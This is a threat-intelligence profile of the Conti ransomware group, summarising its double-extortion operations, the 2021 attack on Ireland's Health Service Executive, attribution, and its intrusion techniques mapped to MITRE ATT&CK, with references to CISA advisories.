Conti

Executive Summary

Conti was a Russia-aligned ransomware-as-a-service (RaaS) operation active from approximately 2020 through early 2022. CISA, FBI, and NSA jointly documented the group in advisory AA21-265A as responsible for over 400 attacks against organizations worldwide. MITRE ATT&CK tracks associated activity under G0098.

The group operated a double-extortion model: encrypting victim data while simultaneously threatening to publish exfiltrated files on a dedicated leak site (“Conti News”) if ransom demands were not met. Conti functioned as a ransomware-as-a-service platform, with a core team providing tooling, infrastructure, and negotiation support to a network of affiliates who conducted intrusions independently.

Notable Campaigns

A Conti attack targeted Ireland’s Health Service Executive (HSE) in May 2021. The attack disrupted hospital IT systems across Ireland, forcing the cancellation of outpatient appointments and diagnostic services. The Irish government declined to pay the ransom; the decryption key was subsequently provided.

CISA advisory AA21-265A documented over 400 attacks globally against organizations in healthcare, emergency services, law enforcement, emergency medical services, and 911 dispatch centers. Ransom demands in documented cases ranged up to $25 million. The advisory noted a targeting pattern against healthcare and first-responder networks.

Technical Capabilities

Conti’s intrusion chain typically began with phishing-delivered malware — primarily BazarLoader and TrickBot — or exploitation of internet-facing vulnerabilities. Post-access activity consistently followed a pattern documented across the CISA advisory and corroborating incident reporting: Cobalt Strike deployment for command and control, credential harvesting via Mimikatz, lateral movement using Windows administrative tools and SMB shares, and bulk data staging and exfiltration using Rclone or similar utilities prior to ransomware deployment.

The ransomware payload used a combination of ChaCha20 for file encryption and RSA-4096 for key protection. Deployment followed a structured affiliate playbook, as documented in CISA advisory AA21-265A, covering disabling security software, deleting shadow copies, and deploying the encryptor across the network. The group maintained support infrastructure including negotiation teams, leak site operators, and technical staff, consistent with its RaaS operating model.

Attribution

CISA, FBI, and NSA jointly attributed Conti activity to Russia-based cybercriminals in advisory AA21-265A and subsequent updates. The advisory did not identify specific individuals or organizational sponsors. The Russia-based assessment is supported by operational patterns, infrastructure, and the group’s own February 2022 public statement expressing support for the Russian government.

The relationship between Conti and Russian state intelligence services is not established in available public reporting. The group operated as a criminal enterprise; its public alignment statement and operational geography are consistent with a Russia-based criminal operation that is tolerated or not actively suppressed by Russian authorities, which is a distinct assessment from state direction or sponsorship.

MITRE ATT&CK Profile

T1566.001 - Spearphishing Attachment: Initial access relied primarily on phishing with malicious attachments delivering BazarLoader or TrickBot.

T1003.001 - LSASS Memory: Credential access used LSASS memory dumping via Mimikatz.

T1021.002 - SMB/Windows Admin Shares: Operators moved laterally through compromised environments using SMB and Windows Admin Shares.

T1027 - Obfuscated Files or Information: Intrusion activity relied on obfuscated tooling and scripts designed to evade endpoint detection.

T1219 - Remote Access Tools: Operators used Cobalt Strike and legitimate remote access tools including AnyDesk.

T1486 - Data Encrypted for Impact: The ransomware deployment phase encrypted data across compromised networks.

T1490 - Inhibit System Recovery: Operators inhibited recovery by deleting shadow copies and disabling backup mechanisms.

Sources & References

• CISA: Advisory AA21-265A — Conti Ransomware — CISA, 2021-09-22
• CISA: Updated Conti Ransomware Advisory — CISA, 2022-03-09
• Chainalysis: 2022 Crypto Crime Report — Ransomware — Chainalysis, 2022-01-20